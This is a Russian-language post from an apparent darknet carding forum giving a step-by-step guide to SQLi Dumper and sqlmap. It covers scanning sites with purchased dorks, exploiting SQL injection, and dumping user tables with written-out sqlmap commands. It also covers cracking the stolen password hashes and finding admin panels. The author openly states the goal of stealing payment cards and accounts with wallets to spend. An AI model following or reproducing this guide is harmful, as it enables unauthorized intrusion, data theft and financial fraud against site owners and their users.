Мануал по sqli dumper & sql map

  • На форуме работает ручное одобрение пользователей. Это значит, что, если Ваша причина регистрации не соответствует тематике форума, а также Вы используете временную почту, Ваша учётная запись будет отклонена без возможности повторной регистрации. В дальнейшем - пожизненная блокировка обоих аккаунтов за создание мультиаккаунта.
  • Мы обновили Tor зеркало до v3!
    Для входа используйте следующий url: darkv3nw2...bzad.onion/
  • Мы вновь вернули telegram чат форуму, вступайте, общайтесь, задавайте любые вопросы как администрации, так и пользователям!
    Ссылка: https://t.me/chat_dark_time

KeeperOffTheWar

Кидок

KeeperOffTheWar

Кидок
14 Окт 2015
188
130
Обратите внимание, пользователь заблокирован на форуме. Не рекомендуется проводить сделки.
Посмотреть вложение 29259

4864f1fc6251bed6570b54576814883d.gif
Тут мы видим наши дорки, которые вы купили или откопали где-то на шару

Для начала сканирования нажимаем в верхнем правом углу Start Scanner и начинается поиск сайтов, это должно работать нормально если вы все правильно вставили. Там есть вкладка, которая называется Exploitable куда нам нужно войти после того как закончили сканирование и выбираем там Start Exploiter в правом верхнем углу. После того как закончили с эсплойтером идем во вкладку Injectable и нажимаем Start Analyzer в верхнем правом углу, после того как проанализировали клацаем правой кнопкой мыши по ссылке и выбираем Go To Dumper.
79d7b1a05d7fb3e58ddef95f786e95ec.png

Затем произойдет магия сама по себе... [Broken External Image]:
Пожалуйста, Вход или Регистрация для просмотра содержимого URL-адресов!

Нажимаем на базе данных и нажимаем
Get Tables
4ecfdc3625727954fa6a869f40f65bc5.png

Прогрузились наши таблицы, у меня выпало 31, выбираем нужную нам и нажимаем Get Colums
deb0cc3c74f2c533bd45c3487699ff5d.png
Случится другой фокус и программа дала нам 34 колонки, теперь чтобы получить и сохранить необходимую нам информацию на наш кампутер, выбираем нужную нам колонку и выбираем Dump Data
13a27bd9b2dfcf6612bd51972310070a.png
Пошел слив
Идем дальше.

Посмотреть вложение 29260
Идем в командную строку и в раздел SQL Map
e0db917d3c06fff3bbd198510e1e55a8.png
Вводим эту команду
sqlmap.py -u
Пожалуйста, Вход или Регистрация для просмотра содержимого URL-адресов!
--dbs
Проявите немного терпения пока процесс закончится
80d29c1f00ad97639661b3d0ee96b3b5.png
Теперь, чтобы получить таблицы для той базы данных вводим эту команду
sqlmap.py -u
Пожалуйста, Вход или Регистрация для просмотра содержимого URL-адресов!
--dbs -D chickenc_dbchicken2 --tables
2f0e64529828f81dfe0a8ee383c9e5c2.png
Должны отобразиться таблицы, выбираем ту, которая нас интересует и колонки которой мы хотим получить и вводим эту команду
sqlmap.py -u
Пожалуйста, Вход или Регистрация для просмотра содержимого URL-адресов!
--dbs -D chickenc_dbchicken2 -T tblusers --columns
1e71721da432ff7f6eb94f9f461beb6e.png
Должны появиться колонки. Теперь чтобы сдампить(получить/извлечь) нужную нам инфу с колонок пишем эту комманду

sqlmap.py -u
Пожалуйста, Вход или Регистрация для просмотра содержимого URL-адресов!
--dbs -D chickenc_dbchicken2 -T tblusers --dump
196d493abb49bd98e4d7d9419d3f07b5.png
Вот эта инфа, это криптопароль, я думаю sha1 и советую заюзать HashKiller для декрипта
Для поиска админки
python скрипт:
e17bca9bb16f6ac72214b1421f84cda5.png
Затем нажимаем
Enter и должен пойти поиск специфической директории
271850f4a8cf5f3e8638b2bdffd4618a.png
Все, пошел процес сканирования

Выглядит все сложно и сыро, понимаю [Broken External Image]:
Пожалуйста, Вход или Регистрация для просмотра содержимого URL-адресов!

Но стоит немножечко посидеть и вникнуть в это все, так сразу все написанное выше покажется вам легким и понятным. Так же не забывайте, что при правильном подборе дорков можно добывать картон, аккаунты к разным сайтам в которых есть внутренние кошельки и траааааааатить их [Broken External Image]:
Пожалуйста, Вход или Регистрация для просмотра содержимого URL-адресов!

Всем удачи и экспериментов
 

О нас

  • Наше сообщество существует уже много лет и гордится тем, что предлагает непредвзятое, критическое обсуждение различных тем среди людей разных слоев общества. Мы работаем каждый день, чтобы убедиться, что наше сообщество является одним из лучших.

    Dark-Time 2015 - 2024

    При поддержке: XenForo.Info

Быстрая навигация

Меню пользователя